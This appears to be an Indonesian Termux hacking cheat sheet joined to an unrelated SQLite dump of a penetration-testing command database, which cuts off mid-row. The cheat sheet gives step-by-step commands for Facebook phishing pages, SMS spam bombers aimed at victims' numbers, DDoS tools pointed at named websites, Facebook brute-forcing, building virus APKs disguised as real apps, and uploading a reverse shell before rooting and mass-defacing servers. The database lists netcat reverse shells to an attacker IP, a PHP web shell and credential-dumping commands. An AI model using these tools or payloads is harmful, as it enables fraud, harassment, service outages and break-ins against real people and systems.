./ubuntu.sh $ ./start.sh (```Install``` *Weeman* ) $ apt update && apt upgrade -y $ apt install git -y $ apt install python2 -y $ git clone https://github.com/evait-security/weeman $ cd weeman $ chmod 777 weeman.py $ python2 weeman.py Contoh $ set url http://facebook.com $ set action_url http://facebook.com run (Bisa diganti phising nya, kalau Twitter ya bisa ataupun yg lain) *Ikuti Langkah Demi Langkah* (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py Ikuti Langkah Demi Langkah (```Install``` *SQLMAP*) $ apt update $ apt install python $ apt install python2 $ apt install git $ gi clone https://github.com/sqlmapproject/sqlmap $ cd sqlmap $ Python2 sqlmap.py Exemple:- Python2 sqlmap.py -u website --dbs -D acuart --tables -D acuart -T users --columns -D acuart -T users -C name,email,phone -dump Ikuti Langkah Demi Langkah Lacak ip git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak bbom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjh --------------------------------------------------------------------- *1.Spammer SMS Grab Install Spammernya dulu* $pkg install python2 $pip2 install requests $pkg install git $git clone https://github.com/p4kl0nc4t/Spammer-Grab $cd Spammer-Grab $ls $chmod +x spammer.py $python2 spammer.py --delay 30 nomor korban. --------------------------------------------------------------------------------------- *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py --------------------------------------------------------------------------------------- *2.Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php --------------------------------------------------------------------------------------- 3. Install webdav $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav $ curl -k -O https://pastebin.com/raw/HnVyQPtR $ mv HnVyQPtR webdav.py $ python2 webdav.py --------------------------------------------------------------------------------------- *2. Xerxes* $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 --------------------------------------------------------------------------------------- *3. Torshammer* $ pkg update $ pkg install git $ Pkg install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py -T -t seword.com ( web y ang kalian attack ) #mr khanz'''TOOL TERMUX Cara Install D-tect tool di android termux (command ) : $ apt install git $ apt install python2 $ git clone https://github.com/shawarkhanethicalhacker/D-TECT $ ls $ cd D-TECH $ chmod +x d-tect.py $ python2 d-tect.py cara uninstall tool termux rm -rf toolsnya cara buat virus cd /sdcard cd vbug ls chmod vbug.py chmod -v vbug.py python2 vbug.py irssi /connet irc.freenode.net /nick w3wandroid /join #modol _________________________ DDOS via Termux 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 104.27.146.125 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py _________________________________________ Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy ________________________________________ musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak musik ________________________________________ Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah ________________________________________ Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya _______________________________________ Menampilkan animasi kereta :v $ pkg install sl $ sl _______________________________________ menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch _______________________________________ menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya _______________________________________ $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dgn mengetik nomornya.  Tutorial membuat virus seperti aplikasi aslinya🚨 Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh auto boot fb git clone https://github.com/Senitopeng/BotFbBangDjon.git cd BotFbBangDjon python2 bangdjon.py melihat id fb https://findmyfbid.in/ git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction cara membuat virus cd Vbug/vbug.py cd /storage/emulated/0/Vbug cd vbug Python2 vbug.py CRACK PASSWORD HASH git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ cd FHX-Hash-Killer python2 FHXHashKiller.py git clone https://github.com/UltimateHackers/Hash-Buster $ cd Hash-Buster $ python2 hash.py pkg install irssi irssi (enter) /connect chat.freenode.net /nick oki /join #mrmaze Cara install Metasploit di termux (No Root) ~ apt update && apt upgrade ~ apt install curl ~ curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh ~ chmod +x metasploit.sh ~ ./metasploit.sh ... Tunggu proses instalasi sekitar 30-40 menit tergantung koneksi internet ... ( hack fb via termux ) $apt update $apt upgrade $apt install python2 $apt install python2-dev $apt install wget $dip2 install mechanize $cd/sterage/emulated/0 $python2 fbbrute.py ( yg tdi di download di tunda di luar folder ) $storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder ) =tinggal tunggu fassword nya muncul Jika beruntung *silahkan mencoba* tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools pip install mps_youtube pip install youtube_dl apt install mpv mpsyt /judul $ pkg update && pkg upgrade CHATTING VIA TERMUX $ pkg install irssi $ irssi $ /connect chat.freenode.net $ /nick 1235 12345 di ganti sesuai nama/nick agan $ /join #XCAteam 100% work boom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjhj +6282399188718 Spam bom mall $ pkg install update $ pkg install upgrade $ pkg install wget $ pkg install php $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip $ unzip bom-mall.zip $ cd bom-mall $ php run.php (```Install``` *SpamTsel*) $ pkg install curl $ pkg install php $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php $ chmod 777 bombtsel.php $ php bombtsel.php 3) Tool Spam LITESPAM $ pkg install php $ pkg install toilet $ pkg install sh $ pkg install git $ git clone https://github.com/4L13199/LITESPAM $ cd LITESPAM $ sh LITESPAM.sh atau bash LITESPAM.sh Masukan Nomer nya... VBugMaker Termux -apt update && apt upgrade -apt install git -apt install python Donwload file ->http://upfile.mobi/YGwg8gQLuvv Pindah ke directory Next -unzip vbug.zip -mv vbug $HOME -cd vbug -ls -chmod +x vbug.py -python2 vbug.py #Done Cara Root Server Di Termux Dengan Ngrok Perl/PHP BackConnecter Mass Deface. 1. Install~ Buka Termux 2. Install Ngrok Registrasi Autthokennya. (http://ngrok.com/download;http://ngrok.com/signup) $ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip $ unzip ngrok-stable-linux-arm.zip ngrok $ ./ngrok authtoken JWJDKNxxxxxxxxxx $ ./ngrok tcp port :~# Welcome : Plan Free "0.tcp.ngrok.io:port-ngrok ~> localhost:port" 3. Download Perl/PHP Backconnecter (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) dan Edit file nya, cari $ip dan $port ganti dengan (0.tcp.ngrok.io:port-ngrok) ~>Upload ke website (PERL: ON)(PHP: ON) 5. in termux command : $ nc -lnvp port 6. in backdoor shell : $ perl perl-reverse-shell.pl (atau) > http://situs.co.li/perl-reverse-shell.php (Run the script simply by browsing to the newly uploaded file in your web browser) .----(after backconnect successfully)--- 7. upload LOCALROOT $ wget https://domain.com/localroot/dirty $ chmod 777 dirty $ ./dirty New password: ndasmu (successfully rooted) 8. import TTY shell ===>jika menggunakan dirty<=== $ echo "import pty; pty.spawn('/bin/bash')" > /tmp/sad.py $ python /tmp/sad.py ===>jika menggunakan cowroot<=== $ python -c 'import pty;pty.spawn("/usr/bin/passwd")' (https://evertpot.com/189/) .-------------------------------------------- 9. login as ROOT $ su rintoar Password: ndasmu .-------------------------------------------- 10 ./mass (https://m.youtube.com/watch?v=HPQQok40v78) .-------------------------------------------- WEEMAN [✓] apt update && apt upgrade -y apt install git -y apt install python2 -y git clone https://github.com/evait-security/weeman cd weeman chmod 777 weeman.py python2 weeman.py Ex set url http://facebook.com set action_url http://facebook.com run ___________________________________________ Hunner framework apt update apt install python apt install git -y git clone https://github.com/b3-v3r/Hunner cd Hunner chmod 777 hunner.py python hunner.py ___________________________________________ SQLMAP [✓] apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap cd sqlmap Python2 sqlmap.py ______ Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump ___________________________________ DDOS XERXES [✓] clang xerxes.c -o xerxes ./xerxes website 80 ___________________________________ DDOS TORSHAMMER [✓] apt-get update apt-get install python2 apt-get install tor apt-get install git git clone https://github.com/dotfighter/torshammer.git cd torshammer python2 torshammer.py -T -t website ___________________________________ BRUTEFORCE [✓] apt update apt upgrade apt install python apt install pip pip install wordlist apt install worlist Wordlist -h cd /sdcard Cat pas.txt ___________________________________ Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com ___________________________________ Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py ___________________________________ BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py ___________________________________ HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run ___________________________________________ RED HAWK apt update apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK chmod +x rhawk.php apt install php ls php rhawk.php ___________________________________________ D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com ___________________________________________ viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com __________________ Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py PERKIRAAN cuaca curl http://wttr.in/ (lokasi) tool Routersploit apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang rsf.py Cara pake cd routersploit ./ rsf.py use scanners/autopwn show options set target 192.168.1.1 set port 8080 set threads 10 masukkan exploitsnya set target 192.168.1.1 -check -run tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu&#8230; $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (```Install``` *Weeman* ) $ apt update && apt upgrade -y $ apt install git -y $ apt install python2 -y $ git clone https://github.com/evait-security/weeman $ cd weeman $ chmod 777 weeman.py $ python2 weeman.py Contoh $ set url http://facebook.com $ set action_url http://facebook.com run (Bisa diganti phising nya, kalau Twitter ya bisa ataupun yg lain) *Ikuti Langkah Demi Langkah* (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py Ikuti Langkah Demi Langkah (```Install``` *SQLMAP*) $ apt update $ apt install python $ apt install python2 $ apt install git $ gi clone https://github.com/sqlmapproject/sqlmap $ cd sqlmap $ Python2 sqlmap.py Exemple:- Python2 sqlmap.py -u website --dbs -D acuart --tables -D acuart -T users --columns -D acuart -T users -C name,email,phone -dump Ikuti Langkah Demi Langkah Lacak ip git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak bbom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjh --------------------------------------------------------------------- *1.Spammer SMS Grab Install Spammernya dulu* $pkg install python2 $pip2 install requests $pkg install git $git clone https://github.com/p4kl0nc4t/Spammer-Grab $cd Spammer-Grab $ls $chmod +x spammer.py $python2 spammer.py --delay 30 nomor korban. --------------------------------------------------------------------------------------- *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py --------------------------------------------------------------------------------------- *2.Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php --------------------------------------------------------------------------------------- 3. Install webdav $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav $ curl -k -O https://pastebin.com/raw/HnVyQPtR $ mv HnVyQPtR webdav.py $ python2 webdav.py --------------------------------------------------------------------------------------- *2. Xerxes* $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 --------------------------------------------------------------------------------------- *3. Torshammer* $ pkg update $ pkg install git $ Pkg install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py -T -t [8/11 18.11] BOT X3NONOLIMIT: Hack FACEBOOK *apt update && apt upgrade *pkg install python2 && pkg install wget *pip2 install mechanize && pip2 install request *pkg install git *git clone https://github.com/tikuskecil/multi-bruteforce-facebook *cd multi-bruteforce-facebook *ls *python2 MBF.py

-- -- File generated with SQLiteStudio v3.2.1 on Sun Feb 7 14:58:28 2021 -- -- Text encoding used: System -- PRAGMA foreign_keys = off; BEGIN TRANSACTION; -- Table: Commands CREATE TABLE Commands (Command_No INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Name TEXT REFERENCES Programs (Name) NOT NULL, Description TEXT NOT NULL, Command TEXT, File BLOB); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (1, 'Kerbrute', 'brute single user password', 'kerbrute bruteuers [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (2, 'Kerbrute', 'brute username:password combos from file or stdin', 'kerbrute brutforce [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (3, 'Kerbrute', 'test a single password agains a list of users', 'kerbrute passwordspray [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (4, 'Kerbrute', 'Enumerate valid domain usernames via kerberos', 'kerbrute userenum [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (5, 'Name-That-Hash', 'Find the hash type of a string', 'nth --text ''<hash>''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (6, 'Name-That-Hash', 'Find the hash type of a file', 'nth --file <hash file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (7, 'Nmap', 'scan for vulnerabilites', 'nmap --script vuln <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (8, 'Nikto', 'Scan host for vulnerabilites', 'nikto -h <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (9, 'SMBClient', 'check for misconfigured anonymous login', 'smbclient -L \\\\<HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (10, 'Hydra', 'Brutforce a webpage looking for usernames', 'hydra -l <user wordlist> -p 123 <HOST_IP> http-post-form ''/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=<output string on failure>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (11, 'SMBMap', 'enumerates SMB file shares', 'smbmap -u <user> -p <pass> -H <host IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (12, 'WPScan', 'Enumerate Wordpress website', 'wpscan --url <wp site> --enumerate --plugins-detection', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (13, 'WPScan', 'enumerate though known usernames', 'wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (14, 'PowerShell', 'bypass execution policy', 'powershell.exe -exec bypass', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (15, 'TheHarvester', 'gathering informaiton from online sources', 'theharvester -d <domain> -l <#> -g -b google', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (16, 'Netcat', 'open a listener', 'nc -lvnp <port #>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (17, 'Netcat', 'Connect to computer', 'nc <attacker ip> <attacker port>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (18, 'GoBuster', 'Eunmerate directories on a website with a cookie', 'gobuster dir -u http://<IP> -w <wordlist> -x <extention> -c PHPSESSID=<cookie val>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (19, 'SQLMap', 'map sql at an IP', 'sqlmap -r <IP> --batch --force-ssl', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (20, 'John the Ripper', 'Use wordlist to parse hash', 'john <HASHES_FILE> --wordlist=<wordlist>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (21, 'John the Ripper', 'unencrypt shadow file', 'john <Unshadowed passwds>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (22, 'Unshadow', 'combine /etc/passwd and /etc/shadow file for cracking', 'unshadow <passwd> <shadow>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (23, 'Hashcat', 'crack hashes with a wordlist', 'hashcat -m <hash type> -a 0 -o <output file> <hash file> <wordlist> --force', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (26, 'Enum4Linux', 'basic command', 'enum4linux -a <IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (27, 'SMBClient', 'connect to a SMB share', 'smbclinet //<IP>/<share> -U <username>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (28, 'Netcat', 'connect with shell (-e doest always work)', 'nc -e /bin/sh <ATTACKING-IP> 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (29, 'Netcat', 'connect with shell (-e doest always work)', '/bin/sh | nc ATTACKING-IP 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (30, 'Netcat', 'done on the target', 'rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (31, 'SQLMap', 'Check form for SQL injection', 'sqlmap -o -u "http://meh.com/form/" –forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (32, 'SQLMap', 'automated SQL scan', 'sqlmap -u <URL> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (33, 'CrackMapExec', 'run a mimikatz module', 'crackmapexec smb <target(s)> -u <username> -p <password> --local-auth -M mimikatz', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (34, 'CrackMapExec', 'Command execution', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' -x whoami', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (35, 'CrackMapExec', 'check logged in users', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' --lusers', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (36, 'CrackMapExec', 'dump local SAM hashes', 'crackmapexec <target(s)> -u ''<uesrname>'' -p ''<password>'' --local-auth --sam', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (37, 'CrackMapExec', 'null session login', 'crackmapexec smb <target(s)> -u '''' -p ''''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (38, 'CrackMapExec', 'list modules', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (39, 'CrackMapExec', 'pass the hash', NULL, NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (41, 'IKE-Scan', 'attack pre shared key with dictionary', 'psk-crack -d </path/to/dictionary> <psk file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (42, 'IKE-Scan', 'If you find a SonicWALL VPN using agressive mode it will require a group id, the default group id is GroupVPN', 'ike-scan <IP> -A -id GroupVPN', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (43, 'IKE-Scan', 'to find aggressive mode VPNs and save for use with psk-crack', 'ike-scan <IP> -A -P<file out>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (44, 'John the Ripper', 'crack passwords with korelogic rules', 'for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset} -w:<wordlist> <password_file> ; done', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (45, 'Nmap', 'create a list of ip addresses ', 'nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (46, 'Linux commands', 'mount NFS share on linux', 'mount -t nfs server:/share /mnt/point', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (47, 'PowerShell', 'create new user', 'net user <username> <password> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (48, 'PowerShell', 'add user to a group (normaly Administrators)', 'net localgroup <group> <username> /ADD', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (49, 'PSK-Crack', 'brute force with specified length and specified chars (if left blank default is 36)', 'psk-crack -b <#> --charset="<charlist>" <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (50, 'PSK-Crack', 'dictianary attack', 'psk-crack -d <file> <key file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (51, 'SQLMap', 'check form for SQL injection', 'sqlmap -o -u "<url of form>" --forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (52, 'SQLMap', 'Scan url for union + error based injection with mysql backend and use a random user agent + database dump', 'sqlmap -u "<form URL>?id=1>" --dbms=mysql --tech=U --random-agent --dump ', NULL); -- Table: Exploits CREATE TABLE Exploits (Target TEXT, Type TEXT, Criteria TEXT, Method TEXT, Code TEXT, Result TEXT, Notes TEXT); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Injection', 'ability to write to website folder', 'create or edit a mage of the website and insert the code to get remote access to the machine', '<? php system ($ _ GET [''cmd'']); ?>', 'execute code via url', '<URL of php>?cmd=<code to execue>'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'shell', 'enter code into the shell to find vulnerbilities int he machine', 'find / -perm -u=s -type f 2>/dev/null', 'SUID binaries', 'link output to GTFO bins and exploit'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Box', 'Priv Esc', 'Python binary running as root', 'generate a shell using python to grain root access', 'python3 -c "import pty;pty.spawn(''/bin/sh'');"', 'root shell', 'change pyton varibale acordingly'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('SQL', 'Priv Esc', 'MySQL binary running as root', 'enter into MySQL command line and break out into root y using the code', 'mysql> \! /bin/sh', 'get shell from root priv SQL', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', 'low privilage shell', 'use the code to search for programs that run as sudo without password', 'sudo -l', NULL, 'list programs that can be used with sudo and no password'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Windows', 'Priv Esc', 'Powershell', 'use code to enumerate priv esc opertunities', 'wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """', 'list of unquoted service paths that might be used for priv esc', NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'LFI', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Linux', 'Priv Enum', NULL, 'use Linenum.sh to enumerate linux box', 'wget https://www.linenum.sh/ -P /dev/shm/Linenum.sh; chmod +x /dev/shm/linenum.sh ; ./dev/shm/Linenum.sh | tee /dev/shm/lininfo.txt', ' file, /dev/shm/lininfo.txt, with priv esc info', 'it is possible to use other methods of download like: curl or others found on google'); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'No-Auth', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'Re-Registration', NULL, NULL, NULL, NULL, NULL); INSERT INTO Exploits (Target, Type, Criteria, Method, Code, Result, Notes) VALUES ('Website', 'JWT', 'a site that uses jSON as cookies', 'edit the information (with BURP) thats going to the website to gain access without authenitaction', NULL, NULL, NULL); -- Table: Programs CREATE TABLE Programs (Name text PRIMARY KEY NOT NULL UNIQUE, Stage TEXT, Description text, Info text, Features TEXT, Target TEXT, Offensive BOOLEAN, commands TEXT); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nmap', 'Enum', 'Used for scanning a network/host to gather more information', 'man pages on linux', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('BURP Suit', 'Enum, Exploit', 'A program for manipulating HTTP requests, enumeration and Exploit', 'https://portswigger.net/burp/documentation/contents', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Metasploit', 'All', 'Powerfull swiss-army-knife of hacking', 'https://docs.rapid7.com/metasploit/', NULL, 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('MSFVenom', 'Exploit', 'Designed for creating payloads', 'https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom', 'Payloads', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Snort', 'Utility', 'Packet sniffer', 